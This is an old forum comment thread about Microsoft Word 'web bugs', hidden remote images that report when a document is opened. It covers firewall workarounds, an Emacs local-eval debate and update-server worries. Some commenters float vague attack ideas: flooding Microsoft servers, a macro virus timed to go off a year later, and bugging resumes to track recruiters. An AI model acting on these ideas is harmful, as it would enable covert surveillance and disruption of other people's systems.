>"And of course HTML emails" [ ... clever, but not new, why the big MSFT-is-evil hype? ]

This reminds me of a .sig I've loved since the day I saw it:

"The PROPER way to handle HTML postings is to cancel the article, then hire a hitman to kill the poster, his wife and kids, and fuck his dog and smash his computer into little bits. Anything more is just extremism."

- Paul Tomblin, in the Monastery

If I wanted a web browser to view something, I'd use a web browser. If I wanted a word processor, I'd use... well, actually, I'd use anything but Word. But you get the idea.

Why the big "MSFT is evil" hype?

Because it's yet another case of MSFT assuming that the entire world is a Microsoft Orifice shop, and that the entire WWW is limited to your corporate intranet.

Look at the past few years of MSFT's design decisions - they all make sense when you realize that the only use MSFT has for TCP/IP is to share and link data from one Office LAN user to another LAN user, security and privacy issues - as always at MSFT - are an afterthought.

The M$Orifice luser in the cube farm is the only user who(se manager) pays for the product; as a necessary consequence of this, most MSFT design decisions are made with this usage profile in mind (another good example, "zones" of security in IE). When every host can be assumed to be on the corporate LAN (of course, www.microsoft.com is considered part of this LAN - Windows Update being another good example) and is considered "trusted", much of what MSFT does makes much more sense.

It's just as wrong, of course - I'm just saying that it makes sense if you view it from their (rather myopic) perspective.

Re:And of course HTML emails

[j03+h4x0r]

Well, to be honest I'm not one of you Open Source dudes. I'm not against corporate software and I'm not out of hand, against Microsoft.

However, at least with Open Source a "feature" like this wouldn't have been hidden for such a long time. Kind of makes one wonder what other "features" are included with any software product.
Penis bird industries (Nasdaq sympol PNIS)


<O
( \
X

Word Macro Virus meets Internet Cache

[Cardinal]

I can see it now. A word macro virus that uploads the contents of everybody's c:\mydocu~1 to a central web server, and archives and indexes it all, so that a casual web surfer can wander through the personal documents of tens of thousands of hapless MSOffice users.

This is different...

[jamused]

...in that when you open a word processing document, you don't usually think that you're "doing something on the Internet." You especially don't think that you are communicating and setting cookies via invisible images.

Hmmm...

[Frizzle+Fry]

Props to their CTO Richard M. Smith

Yes, good job RMS.

Care about freedom?

Another interesting feature...

There is also a feature built into Microsoft Word, which combines with these user tracking facilities. It is called the Predictive Artificial Neural Network Tracking System, and as the name suggests, it is a neural network built into Word. Once this ANN has harvested a sufficiently large list of people who have opened your Word document, it is actually able to predict who will open your document in the future - it is even able to predict when people you've never met before will open the document.

Thus, this technology gives you the possibility to predict unauthorised access to your documents before it actually happens, thus enabling you to apprehend and punish the criminals _before_ they commit the crime. This technology is intended to be used in conjuction with the DMCA to prevent the unauthorised disclosure of confidential electronic documents. Slightly creepy, but very interesting technology nevertheless.

Re:I have just one thing to say....

[um...+Lucas]

Star Office currently bites. On PC's it attempts to take over/supplement the entire OS. One start menu might be annoying, but two are just absurd. Plus the fact that it becomes your default web browser, and I haven't found a way to circumvent that as of yet... Even on Solaris, the thing is slow as molasses... and no, it's not the "slowaris" effect. I tried running it on a dual cpu 400 MHz machine with no load, and it still took ages to even launch. everything else, even netscape, was much more responsive than Star Office could even hope to be...

Inverted Firewall?

I swear MS's VC++ help system also periodically hits the net. Does anybody have software to monitor outgoing connections? Sort of an inverted firewall? I know the net* group of utilities (netstat, etc?) will let you look at current connections, but what I want is programmatic access to this stuff. I want the ability to 1) monitor, 2) deny, and 3) flood the target (appropriate for MS, I think. they want info, let's give it to them and choke NT IIS). Something low level, like WinDump's NDIS driver, or perhaps a TCP/IP Service Level Provider (or whatever MS calls that additional TCP/IP layer). Hell, perhaps just a low tech netstat spawn and scrape the output into a pipe and parse it... ugh... I for one do not approve of these programs promiscuously hitting the net. But I ramble... say, it's time for a Coke, I think.

Re:Inverted Firewall?

[java.bean]

I don't have the documentation handy, but if you have MSDN, I specifically remember MS building the ability to do this into the TCP/IP stack that comes with Windows 2000. If I think of it later I'll post more information. (You need to be a C/C++ programmer too. :-) )

--jb

Who's reading my resume?

[spudboy]

Here's an actual reason to send your resume in Microsoft Word format -- you can track who at the company is reading it and when. Put a bullet graphic on your web site, hold your nose and go to Kinko's to save your resume in Microsoft Word format, and sit back and track it.

"Hi, this is Bob. I'm applying for the Internet security position, and I'm calling about my resume which you're looking at right now on your Macintosh." Freak them out but get the job.

Mapping IP addresses to user names and phone extensions is a simple matter of social engineering and common sense.

Re:Who's reading my resume?

[Fas+Attarac]

Most people (I would hope) would send their resumes in formats their potential employer suggests and/or states that they accept. If they don't specify, fax and/or mail it. If they say "electronic", I'd e-mail them a text copy with a URL to an HTML copy. If they say "Word" (and some do), Word is what they'll get.

Major companies nowadays are requesting only textual resumes. This way they are light on space, can be easily searched and easily integrated in the company's internal resume system (assuming they have one), and people within the company looking for applicants have to do less work and can deal with a standardized document format. It's rare that a company will request a Word format, but it happens.

If someone is blindly sending you a resume in Word, there are other reasons to reject it that don't necessarily have anything to do with the applicant's skills at system security.

Re:Who's reading my resume?

[Fas+Attarac]

You're making the assumption that the person doing the tracking automatically knows the identity of the person doing the reading. The only thing these "bugs" can tell the "bugger" is the IP address of the person reading the document. I guess you can insert some sort of unique ID into the resume so that you can tell what version of the document they're reading (sending a slightly different version of the document to each person you originally send it to). Could be good for detecting information leaks, but isn't very useful for figuring out the identity of the person actually reading the document, unless you have the ability of going to the ISP and retrieving the identity from them, or if perhaps you have some cookies already set up with identifying information. Either way, that's a lot of if's.

Generally speaking, downloading a Word document from the web only nets the malicious user your IP address and/or hostname, nothing more than what they would get if you browsed an "evil" web page at their web site.

Re:Who's reading my resume?

[hawkfish]

This could be great for reverse engineering bottom feeders.

I mean headhunters.

Re:Who's reading my resume?

[sjames]

"Hi, this is Bob. I'm applying for the Internet security position, and I'm calling about my resume which you're looking at right now on your Macintosh." Freak them out but get the job.

Nahh, be creative! Have a macro do some digging first. "Hi, this is Bob. I was applying for the Internet security position at your company. You read my resume yesterday. Anyway, I'd like to apply for the job sitting on my ass at home for $50,000 a year. By the way, who's that Lola chick you keep emailing. How'd you talk your wife into letting you see her?"

PHB: Your hired!

Re:Who's reading my resume?

[ArsonSmith]

mv resume.txt resume.doc

has always worked for me. Word opens it
up without so much as a warning or complaint

Re:Who's reading my resume?

[Fas+Attarac]

I was speaking about major companies. The kind that are processing dozens if not hundreds of resumes per day. You are correct in that most small firms are going to be reading your resume in either a nice printed format or in Office, so it might be logical for them to ask for it in Word.

Large companies, on the other hand, can't afford to do this with every applicant. Resumes are stored in a database in textual form, and when some group within the company needs a particular skill set, the resumes are searched, pulled and delivered, all in a standard format. This facilitates quick and easy comparisons of skills. When you're at this level, they could really care less how presentable your resume looks. They're interested in the contents.

I for one wouldn't mind seeing an XML resume format. One that had enough flexibility so as to be searchable by skills, past experience, and with the ability to be styled via XSL or CSS so that it can be printed and look just as good as if it were done professionally in Word.

Tantamount to stealing?

[merlix]

Isn't this tantamount to stealing?

If the bug fires up the phone line to your ISP, it's using phone charges (and possibly ISP charges) without your permission.

Ahem.

Re:Tantamount to stealing?

[mrfiddlehead]

If the bug fires up the phone line to your ISP, it's using phone charges (and possibly ISP charges) without your permission.

Don't laugh ...

I'm going to sue Microsoft from the cost, 97 - hey there's no cents symbol on my keyboard, when did that happen - cents, of dialing up my ISP and contacting the owner of that document I opened. And to make matters worse, I did it 370,000 times so it adds up.

Bill, make out a cheque for $500,000 US and we'll call it even.

Thanks

Re:Tantamount to stealing?

[Enzondio]

How exactly is it going to "fire up the phoneline to your ISP" without your permission. If you're not connected it'll prompt you to dial up just like any other application (assuming you have your system setup that way).

I can only assume you didn't read the article.

Re:Tantamount to stealing?

[paRcat]

It's possible to have dial-up networking work without asking for information. Assuming that you've used it at least once and told it to save your username and password, it's basically an automatic thing. You would still see it dialing, but that doesn't make it a non-issue.

Re:Tantamount to stealing?

[jcrowe]

I think that the real advantage of this bug would be directed at those with "always on" connections, that way the ip addy in the server logs will be something other than a dynamicly generated isp ip. You also have to remember that the general public won't understand this bug even after it's carefully explained to them.

Re:Tantamount to stealing?

[dead_penguin]

Dial-up internet access? Does anyone still do that? That's like, sooooooo 1990's!

(better read all that with a big fat ;) !!!)

Junkbuster will work here

[java.bean]

Word will use Internet Explorer to do this, which also means it will use IE's proxy settings. Just another good reason to use Junkbuster. Of course, there's a very small chance the host images are coming off of are actually in your scookie.ini.

--jb

Re:Junkbuster will work here

[kensail]

Actually the way to make this work/(not work?) is to set a proxy configuration in IE that DOES NOT work. Then IE will gack and not find the proxy. This means that you need to use netscape or mozilla as your regular browser.

Re:Junkbuster will work here

Its not IE doing the connecting, according to Zone Alarm it is Word itself, same with clicking on a html link in Word. It does use the IE proxy settings though.

Personally...

[tealover]

I hate the term "web bug". Actually, I'm more offended at the people who come up with these stupid terms rather than the potential abuse they bring about.

I propose that we direct our energies to tracking and hunting down people who come up with these terms and sending them to Texas. I'm sure they'll know what to do about them down there.

Re:Personally...

[dublin]

Yup, we do. Does "Git a rope!" mean anything to you?

(For the clueless, this is a reference to a famous Pace Picante Sauce commercial - a group of cowhands on the trail are looking at the salsa provided by their new "cookie" and discover it's not the good stuff from San Antonio, but is made in "New York City??!!". The lead cowpoke turns to another and orders, "Git a rope!", as Cookie gulps and realizes he's about to get stretched. The only reason I bother to explain this is for non-US readers...)

Now part of this I don't have a problem with

[Kierthos]

See, I'm not one of those "all information deserves to be free" geeks who thinks that it is perfectly okay in all cases to spread copyrighted information all over the place. So I can support the concept of using this to track copyrighted documents in most cases.

However, I can't stand the idea that outside of that limited arena that anyone can track the documents I read if they have any of these embedded graphics files. I have enough problems with cookies tracking how often I check certain web sites. This is intolerable. At the very least, it's an invasion of privacy, and the simple matter of 'turning off cookies' falls on deaf ears as most of the End Users won't know about this invasion of privacy or the need to turn off cookies.

In any case, Microsoft is coming out of this looking like the bad guys again, and they _still_ can't differentiate between OS's and apps... :P

Kierthos

Amen

[DiningPhilosopher]

Precisely. I was going to post this myself. If a Word document I opened caused Word ot try to access a website, ZoneAlarm would tell me so, and I'd respond with a quick click on the "HELL NO" button.

http://www.zdnet.com/ downloads/partners/zonealarm/download.html

Not that I'm encouraging anyone to do this, but,

[tcd004]

You know what would truly make a virus destructive.

Design a macro virus that is time activated, but don't be stupid and set it off two weeks after you distribute it.

Send that puppy out to propogate, and set it to infect a full year later. By that time it would be on every computer in the universe. Kind of like the AOL install.

just rambling.

tcd004

Word for Unix

[Jeffrey+Baker]

ln -s `which strings` /usr/local/bin/word

Re:Word for Unix

[chamont]

Actually, that works pretty well. Don't forget 'word | less' for those really long documents.

Monty

Re:Word for Unix

[devin]

Even better than that: antiword.

Software that requres net access during install...

This is only the beginning. Expect to see software checking its "CD key" over the internet so pirated copies could be remotely and automatically disabled. Or browser plug-ins to upload your surfing habits. MPEG players to report what you're playing. News reader software to ship the subject lines of what you read off to HQ for analysis. And expect software to refuse to run without at least a periodic net connection (like DIVX or satellite TV systems).

not strictly a Microsoft problem

[Pink+Daisy]

I know that a lot of people enjoy bashing Micro$oft when a hole like this turns up in their products, but just for perspective, this will apply to any application that has sufficient integration. And as far as that goes, even the Privacy Foundation says that the integration is potentially useful and they recommend keeping it there. Just wait a little while; integration and component reuse is a very important feature of MS Windows, but Linux is catching up quickly. Soon we'll have this sort of problem also.

Re:not strictly a Microsoft problem

[jamused]

You say it will apply to any application that has sufficient integration, I say it will apply to any application that has insufficient security. It would take nothing in particular by way of design to have the word processor default to not trying to pull down non-local images when you open a local document, and to not set cookies. Or even to ask you when the document tries to do so.

As a Linux user, I'm certainly never going to install, let alone use, an integrated application that's designed with such a cavalier attitude towards security. Non-local communication should be the exception, not the norm, and should never occur invisibly.

Re:This isn't much different than Web Pages alread

[catkinson]

According to the message I received from Declan McCullagh on the politech list which came directly from Richard M. Smith.

A demonstration "bugged" document for Word 97 and Word 2000 has been set up at:
http://www.privacycenter.du.edu/de mos/bugged.doc
We also found that Excel 2000 spreadsheet files and PowerPoint 2000 slideshows can be "bugged" in the same manner.

So yes, this would be applicable to some other MS apps. My solution, though I don't know if it will work well, would be to continue to use a program which asks me if I want other programs to access the internet. I'm pretty sure that it would catch word before it could get the image from a server. However, I can't guarantee that, this is Microsoft afterall, and we know how open their platform is :)

Emacs too

GNU emacs can do all of these things to (including harboring document virii). What's the diff?

Re:Emacs too

[psicE]

None. Emacs also doesn't know the difference between a document, app, and OS. The difference is most Un*x advocates manage to overlook this fact...

I use joe, I'm safe.

Speaking of which, does anyone know an alternative to MS Word that uses .doc or .rtf files and supports footnotes? That's the one feature that's missing from all the clones.

Re:Emacs too

[pohl]

Hmmm...I open a document, and it contains some emacs lisp code...how does this code become executed automatically without me instructing emacs to do so? I know that I can use M-x eval-buffer, or select a region and use M-x eval-region -- but in order to be analagous to a Word macro virus, wouldn't emacs have to automatically execute the contents of the file without my direction to do so? If this is the case, point this feature out to me. I'm curious.

Re:Emacs too

[ink]

GNU emacs can do all of these things to (including harboring document virii). What's the diff?

That's not true. Emacs does not execute arbitrary lisp code embedde in a document. It certainly doesn't follow hyperlinks and set up cookies transparently. You have to explicitly do all of these things.

The wheel is turning but the hamster is dead.

Re:Emacs too

No, it is true. I have plenty of source code that contains a few lines of lisp code at the top that sets things like tab width. Try putting the following code at the top of a file and then opening it:

// -*- mode: C++; tab-width: 4 -*-

I have my emacs set to ask me about this, but not everybody does (just as not everybody has Word set to ask before macro execution). And just like Word macro questions, the a lot of the remaining people blindly just hit "y"...

Re:Emacs too

That's not true. Emacs does not execute arbitrary lisp code embedde in a document.

I guess that I must have been hallucinating when I saw the comp.risks posting describing Emacs executing arbitrary lisp copde in a document, then. And the other comp.risks posting, six years later, describing exactly the same thing.

Don't feel bad; most people don't know that Microsoft isn't creating new risks, they're just duplicating the stupidity of GNU a decade earlier.

Re:Emacs too

[ianezz]

but in order to be analagous to a Word macro virus, wouldn't emacs have to automatically execute the contents of the file without my direction to do so?

Premise: default values in GNU Emacs regarding the subject are reasonable - so IMHO it's not a problem at all (and it hasn't been in the past, indeed).

Search the GNU Emacs documentation for "Local variables", which are completely safe, except for the "eval" construct.

The default behaviour for Emacs is to show you the code in the eval construct and ask for confirmation. You may change the default behaviour using M-x customize-variable enable-local-eval.

In order to confirm you have to manually type "yes" followed by "Enter", while "no" is the default answer.

So, to give a brief answer: Emacs, by default, doesn't execute the content of a file when it's opened without explicit directions to do so.

Re:Emacs too

[TummyX]

And office always warns you when you open a document that contains a macro.

obviously anything that has scripting capabilities (like bash/ksh) can do dangerous things. depends on who you're logged on as, and your permissions as to how dangerous it can get.

its not news that documents with scripts (or scripts themselves) can be dangerous if you don't know what you're doing. and office warns you about them.

you all complain about windows holding peoples' hands. then you complain about this. it is just ridiculus.

i suppose windows should not allow users to run any exe?

Re:This isn't much different than Web Pages alread

[catkinson]

woops! yeah i know preview ... that should be policetechbot.com

Now I'm starting to get paranoid.

[the_other_one]

I just hope this feature never makes it into Star Office or WordPerect.

I guess it will never be safe to use a Microsoft Product to open a document created with a Microsoft Product.

I wonder If my text files created with notepad might be bugged.

Re:Now I'm starting to get paranoid.

[cowbutt]

It's already in StarOffice 5.2! (dunno about previous versions - probably them too...)

On the topic of web bugs

[AbbyNormal]

Question: has anyone heard of Wild tangent? My router the other day started connecting to a website "update.wildtangent.com" out of the blue when I launched win98. I found the directory "wt" in windoze and uninstalled it. Funny thing is, I never agreed to install it AND after I did remove it IE slowed down A LOT when changing btw open windows. Just curious, because this seemed to be related to M$.

Re: On the topic of web bugs

[fireproof]

From their FAQ (See it here . . .):

Who is WildTangent?
Former Microsoft Multimedia evangelist and DirectX creator, Alex St. John, and his partner Cambridge mathematician Jeremy Kenyon founded WildTangent Inc. in June 1998. WildTangent pursues the vision of building a richer more communicative Internet experience through the use of 3D graphics, sound, animation, and interactivity.

and

How did the web driver get installed on my system?
Our web driver provides advanced multimedia capabilities to your web browser. It was installed by a product that needed its services, such as one of our music visualizers, screensavers, or games. It could also have been installed when you visited a web page or by a third party product. In all cases, the web driver announces its installation through a series of licensing screens. If you missed this information, you can view our license agreement or our privacy statement.

-------

Re:On the topic of web bugs

[evand]

Question: has anyone heard of Wild tangent? My router the other day started connecting to a website "update.wildtangent.com" out of the blue when I launched win98.

It looks like your copy of Windows 98 had the WildTangent "3D Streaming Technology" plugin installed. My guess is that the plugin checks for updates of itself whenever IE is launched (or, in this case, IE is launched because it is tied to the OS which was starting...).

Not saying that the fact that WildTangent was installed without you knowing was a good thing, or that it contacting update.wildtangent.com without your permission was a good thing, either. Just an explanation.

Re:On the topic of web bugs

[TheReverand]

Actually they make plugins for winamp among other things. But of course I'm sure MS forced you to install it. I have an idea, why don't you start a class action suit? That way you can get past all the pain and suffereing you were caused when you found that evil wt folder on your harddrive.

Re:On the topic of web bugs

[AbbyNormal]

The FAQ posted by Fireproof actually gave me a clue...going to check out the Control panel for that sucker.

The update actually did not occur UNTIL winbloze98 finished loading. The scary thing as you pointed out is that I NEVER allowed it to install on my system. Problem solved though, just banned update.wildtangent.com until I find out more.

Re:On the topic of web bugs

[Fas+Attarac]

Umm, what's the big deal?

It came installed with something you installed on your system. If you're the type that habitually ignores license screens and just blindly clicks Next when you install stuff, you deserve what you get.

Are you really that concerned that this piece of software is contacting an updates server? Do you have any idea how much software nowadays does this sort of thing? Why is it everyone considers a piece of software that, behind the scenes, checks to see if there are updates of itself an "evil" piece of privacy-invading software? It just seems silly to go through the effort of setting up things like firewall filters just because you don't "trust" what this piece of software is doing. If you really don't trust it, why the hell are you installing it? If you're going to say, "But I didn't know I was installing it!", something else you apparently do trust did install it, so perhaps some trust relationships there need to be looked at.

Re:On the topic of web bugs

[knarf]

Are you really that concerned that this piece of software is contacting an updates server? Do you have any idea how much software nowadays does this sort of thing? Why is it everyone considers a piece of software that, behind the scenes, checks to see if there are updates of itself an "evil" piece of privacy-invading software?

Are you REALLY sure that that 'updates' server is only there to 'update' the software on your computer? And wouldn't you want to know what those 'updates' exactly are? Assuming you read the license before clicking 'yes' or 'finish' to let the installer do its thing (if there even WAS an explicit confirmation before the software got installed on your system), you agreed to have the installer install a certain piece of software on your box. Now what if the 'update' turns that piece of software into a completely different piece of software, one which you NEVER would agree to having it installed on your system. The 'update' does not ask you for confirmation, it just does its thing. And if you read the license, it probably does not contain any safeguard against this.

So, NO, I'd rather update my software myself, or have a competent sysadmin do it. That way, at least we know what is around on the system, and we know how it got there.

Re:On the topic of web bugs

[Kronovohr]

Actually, if I just downloaded sendmail 10.2.1 and started showing connections
going to sendmail.com, I'd shit myself. Not so much because of the privacy
issues, but remember how many of these "hidden features" have cause some
serious problems as far as security goes? Now, taking for granted that some
software applications do check for updates via the web. So what? Well, as
evidenced by the recent DNS hijackings of www.nike.com and other moderately
high-scale websites, it would be possible (not altogether trivial, mind you,
but still highly possible) that someone could hijack the DNS of an update
page and ship it over to www.evilhost.net to run a CGI script that would
respond with "hey! you need to upgrade!" Since most people would be totally
unaware of the server being incorrect, they would grab the update, and wham!
you've just installed a trojan. Tough shit, that's what you should expect
from software in the internet world, right? I'd sure as hell hope not.

In a return to the issue at hand, yes, it's a well known fact that Word can
use URLs for objects. These can also be tinkered with to produce some nasty
results. There have been a few incidents (usually practical jokes) that do
illustrate this, but why should a standard document be connecting to the
internet for anything? Unexpected behavior can really cause havoc if someone
who likes the idea of these "e-mail viruses" and other destructive code
finds a way to do some real damage.

Re:On the topic of web bugs

[Robert+S+Gormley]

You probably installed one of many winamp plugins which use it... - nothing really to do with MS

Re:On the topic of web bugs

[sg_oneill]

The wild tangent plugin is sending off your GPS co-ordinates (Infered by triangulating your Windows CD-KEY code with your serial number on your Pentium and your shoe size), so as to correctly aim the new Masonic Mind control Satelite network.

Re:On the topic of web bugs

[Fas+Attarac]

Are you REALLY sure that that 'updates' server is only there to 'update' the software on your computer?

Again, if you do not trust the software you're running on your computer, why did you install it in the first place?

This also happens in spam.....

[blogan]

I've notice some spam that would try to fetch a graphic from a website. They track your address in the image location so they know who's getting it and who isn't. We need a backwards firewall to prevent traffic like this from leaving.....

Another fun feature...

[bsletten]

Is the versioning information that is often stored in Word documents. This allows "template" documents like contracts, offer letters, etc. to become sources of "extra" data if the originator starts with an existing version and overwrites it! This happened with me once. A co-worker got a copy-and-overwritten offer letter that had my specifics in it when he viewed it under vi.

MORAL: Always start from clean documents (or turn the versioning off if you can)

Re:Another fun feature...

[jesser]

MORAL: Always start from clean documents (or turn the versioning off if you can)

Better yet, Moral: use a format that you can edit with a text editor, and edit it with a text editor.

(If you're stuck with MSWord, I think the versioning feature is called "fast save", because it works by appending new and changed parts of the file when you save it instead of rewriting the entire file each time it is saved. Open in notepad to check before sending if you're paranoid.)

--

Re:Another fun feature...

[psicE]

It's not the official Microsoft versioning feature, which you can enable separately. Technically someone could build a program based on fast save that could delete each layer one by one and "turn back the clock", but the real MS Word versioning feature is more advanced. Not that that's a good thing -]

Re:Another fun feature...

[EyesOfNostradamus]

Technically someone could build a program based on fast save that could delete each layer one by one and "turn back the clock"

I've heard that it was as easy as opening the document and repeatedly clicking undo..., no special program needed... Sorry, I cannot doublecheck it though, as I'm at home right now, on a Linux box ;-)

Re:Another fun feature...

[psicE]

Never worked right for me... I meant after you saved. For some reason, after you save a Word document (I think) it clears the Undo history, and obviously after you quit you can't Undo anymore. I meant with Fast Save you could theoretically send a document to someone and then they use a tool and undo it to see the very first draft of it.

Re:Another fun feature...

[psicE]

Never worked right for me...

I meant after you saved. For some reason, after you save a Word document (I think) it clears the Undo history, and obviously after you quit you can't Undo anymore. I meant with Fast Save you could theoretically send a document to someone and then they use a tool and undo it to see the very first draft of it.

Seems like they're reaching.

[Kupek]

Don't get me wrong, I certainly don't like it, but this is what happens when you access information on the internet. I don't get the impresson that Microsoft even halfway intended this to be the case. This isn't something Microsoft did on purpose, it's a byproduct of a Word document's ability to retreive an image on a remote host.

What Microsoft should do is allow users to disable a document from retreiving any information from a remote host, not just images. They already do this with macros, since everyone knows how dangerous they can be.

This just doesn't seem like it was intentional on Microsoft's part. They fucked up by not allowing users to not retrieve images, but it seems like the Privacy Foundation is reaching a bit. It's definitely a privacy concern (tracking "confidential" documents especialy), but keep in mind that the entire thing is all hypothetical. This just makes a Word document about as safe as your average web page you run across.

Here's a solution to keep it from happening

[Molina+the+Bofh]

I use a firewall, wich, by pure coincidencre, registered today. It's Zone Alarm Pro and they have a [less featured, but functional] free for personal use. It's a very good one, IMO, as it detects when a program opens the winsock, and asks you if you should let that program access the net. It can remember your choice. I recommend it.

So I got curious to see how it'd react to this. Downloaded the demo document from the article and, after opening the document, it told me Word was trying to access it.

I simply didn't allow word to access the net (word was trying to contact 127.0.0.1, probably to IE).

As I didn't grant access to word, it logged:
ACCESS,2000/08/30,16:50:12 -3:00 GMT,WINWORD.EXE was temporarily not allowed to connect to the Internet (127.0.0.1).,N/A,N/A
and the bug didn't work.

Re:Here's a solution to keep it from happening

[Luminous]

I too just recently started using Zone Alarm and have discovered all sorts of apps I have been running want to access the internet. I deny everything that shouldn't be using the internet (like Word) and haven't yet run into any problems.

But in a company setting...I wonder how far this thing could go? I am tempted to create a bunch of documents just to implement a bug tracker in them.

Re:Here's a solution to keep it from happening

[Nightbane]

This does work but only if you have ZoneAlarm installed on that computer.

I for example have ZoneAlarm installed on a computer that is being used temporarily(sp?) for a router. If I accessed a Word document with this bug on another computer connected to my network it wouldn't detect the local connection request (127.0.0.1). It would then let it pass through since it (the router) would see the request as coming from IE, which unfortunately I have enabled since I can't stand netscape.

Re:Here's a solution to keep it from happening

[Molina+the+Bofh]

Zone alarm is a personal firewall.

It doesn't forward packets to other machines, like other firewalls. It's to be used on the computer meant to be protected.

As I said, it uses another concept:
When a program on the local machine tries to open the TCP/IP stack, Zone Alarm asks you if you wish to grant access to it or not. It can remember your decision.

If the program tryes to listen to a port, ZA also asks if the program can act as a server.

The good thing is that all trojans that listen to a socket (such as the infamou Back Orifice, Deepthroat, and all others) will be immediately detected, as you were not expecting a program to act as a server.

It drops incoming packets that don't match your criteria, thus preventing port scan, and others.

It is not supposed to work on a machine acting as a router. Got the concept ? It's very good IMO.

web bug

Well, this web bug use IE's proxy info. Setup IE and configure a fake proxy server. Use netscape for your real work. Each time a web bug trys to go to the internet your prompted for a proxy password. bingo you know.

Who would have thought....

[tiny69]

Who would have thought that the biggest threat to computer security would be a document. One of Office 2000's benefits is - "Web-enabled collaboration and information sharing." Link

I can't wait to find out what other "innovation" gems are still out there.

Bill Gates here...

[DreamingReal]

Hello everybody,
My name is Bill Gates. I have just written up an e-mail tracing program that traces everyone to whom this message is forwarded to. I am experimenting with this and I need your help.

Forward this to everyone you know and if it reaches 1000 people everyone on the list will receive $1000 at my expense.

Enjoy.

Your friend,
Bill Gates

Damn! This was totally true and I missed out!

-------

Re:Bill Gates here...

[psicE]

Actually, it wasn't. First, he didn't write the program; second, he's not your friend.

Re:Bill Gates here...

[jovlinger]

bitch bitch moan moan

informative? informative!?

funny, that I see, but how was that informative.

I could even give you insightful if you twisted my arm, but you have to give me a hint before I see how that was informative.

This, this post is cranky. I'm hungry and I like to take it out on ... you.

Re:Bill Gates here...

[Jose]

now I'm just waiting for the Good Times Virus to come true...

I'm sure MS has a team working on it.

Re:Pr0n

[Ribo99]

Excuse ME?/??
Offtopic???

Are you SMOKING CRACK?????


---

That's not the half of it.

[TheDullBlade]

They don't know the difference between an app and a document.

A=B=C -> A=C

It logically follows that they don't know the difference between a document and an OS. There is further practical proof of this from the way you can open configuration windows from their help files.

Ergo, the next version of MS-Windows will be called MS-Help. Instead of CTRL-ALT-DEL to log in, you'll use F1. Every time you want to type something in, you'll need to reassure your computer that you are indeed familiar with the operation of a keyboard, and probably still be forced to repeat the "This is the space bar. This is what we call the home row." tutorial every time you reboot.

--------

Yes

[Rurik]

Right, a Word Processor does need all the extras for it's varying users, but they should be least be optional. If I want a simple processor, I can disable most everything, and have a small install. If I need a spell checker, I'll go through the Office setup and install it. If I need etc.etc. I should be able to install them seperately from the main client.

Catching plagiarism

[jesser]

In an academic setting, Web bugs might be used to detect plagiarism. A document could be bugged before it is distributed. An invisible Web bug could be placed within each paragraph in the document. If text were to be cut and pasted from the document, it is likely that a Web bug would be picked up also and copied into the new document.

If the creator of the original article is putting web bugs in her document, (I hope) she will end up "catching" more quoting than plagiarism of her article. The resulting signal-to-noise ratio in her web server logs would make the tracking pretty useless.

On the other hand, if it's being primarily used by graders to make sure that everything from sources that contain these things is quoted properly, there's no point in using a web bug - just insert enough invisible tags (an html example would be <b></b>) to later determine where the document came from. Then there's no reliance on the Internet at all, and people won't get paranoid about the green lights on their modems flashing every time they open up documents from certain people.

But what if I can't remember how to spell plagiarism? If I copy the word from the Privacy Foundation article and use it in an essay, is my teacher going to suspect me of illegally copying information?

Thank God for and formats that I can work with in text editors. And for honor codes, which mean people aren't constantly trying to figure out whether other people are cheating or not.

--

excel? yes.

[Alejo]

Worst, excel macros havemore features and more privileges. Look for VBA.

Not exactly THIS bug, but it would work too.

Re:Software that requres net access during install

That's why every time someone tries to fob this kind of thing off on the public, we need to make a stink about it. Joe sixpack isn't going to be interested enough in the details to realize how heinous it is until it's too late. So joe pizzabox hacker needs to find this stuff out and let the public know about it, and explain why its a bad thing.

The EFF or some such group should probably have a project to uncover and track such nasties.

Subscription software is a big enough pain, without all of the other skullduggery someone like M$ is likely to get into. At the very least, software publishers should be required to disclose such things and be severly slapped if they overstep their bounds. It's one thing if you decide to allow a piece of software to do this, it's another if it does it behind your back.

Is there some way to set up a firewall to prevent or at least alert us to such things?

Bugfix: Don't allow incoming word documents

[Telcontar]

Since you can assume that your own Eord documents are under control (unless yet another virus has modified them in such a way that it includes those "web bugs"), you only have to despise other's documents.

For a company, a simple fix is: don't use Word documents from outside - only accept Postscript or PDF.

Which would be a good thing for us Lyx, LaTeX or (insert non-MS office product here) users.

Re:Bugfix: Don't allow incoming word documents

[scowling]

It is trivial to add a web bug to a .pdf document, too. This security "feature" is not limited to Microsoft products.

The only solution is to accept only plaintext, and to only open plaintext documents on old computers that were headed for Asset Recovery anyway, and which are not connected to the Net.

And to never leave your home or get in the bathtub or eat anything but cabbage.
--

Hmm...

[Boiler99]

Hmm...access the internet to send information on who read it when...and the serial number(s) of all MS products installed too probably...I have to say, between processor serial numbers (my first option that I disable in machine BIOS' when building a new machine) and stuff like this, the word "anonymous" is going to fade from our language.

(BTW, I do realize the software piracy checks were NOT included in this, I was just surmising as to the future of items like this)

What /I/ would like to know is

[TheDullBlade]

Why on earth do you even need them? I mean, you (the /. team) have full control of the server, right? So why use a goofy hack like 1 pel images?

It seems to me that it's lazy and irresponsible to require an extra http request.

--------

Re:What /I/ would like to know is

[jovlinger]

Standard response is that they want to catch cached references (laft-alt, you know). However, I'm a bit confused as to why the image isn't cached as well, unless it is retrieved via a POST (GETs are cachable -- they're supposed to be idempotent).

Re:What /I/ would like to know is

[jamiemccarthy]

"Jamie is a fucking liar."

tealover, I don't see an email address for you in your user info. Because you're misquoting Hemos and saying some pretty outlandish stuff, I suppose you're just trolling. But if you'd like to talk seriously about this, please just email me and I can clear up any questions you might have.

I don't think trying to allay your fears in posts here is going to be very fruitful. I'm not trying to silence you here, though; it goes without saying that any email discussion we'd have about this, you could feel free to post.

Jamie McCarthy

Wow.

[Black+Parrot]

Bugs in Word docs, eh? Well, they have bugs in everything else, so why not Word docs too?

--

Actually that'd kick ass

[Greyfox]

You could probably hack up some magic stuff to page you when someone opens your resume, too. After all, this technique would really only be effective if you catch them in the act.

Re:Actually that'd kick ass

[EyesOfNostradamus]

Even if you set it up to page you right away, you'd have to be really quick to map that IP address you get to the name of the employee, and then that name to a phone number. All that is assuming that the company does not sit behind a NAT or a HTTP proxy (same client IP for everybody...)

Re:Actually that'd kick ass

[Ronin+Developer]

Ahhhhh..but perhaps you have the documen run finger and get you all the particulars on the person who's reading your resume AND then send it to your pager.

Great stuff if your applying for a security position...scare them into hiring you.

RD

Re:Actually that'd kick ass

[EyesOfNostradamus]

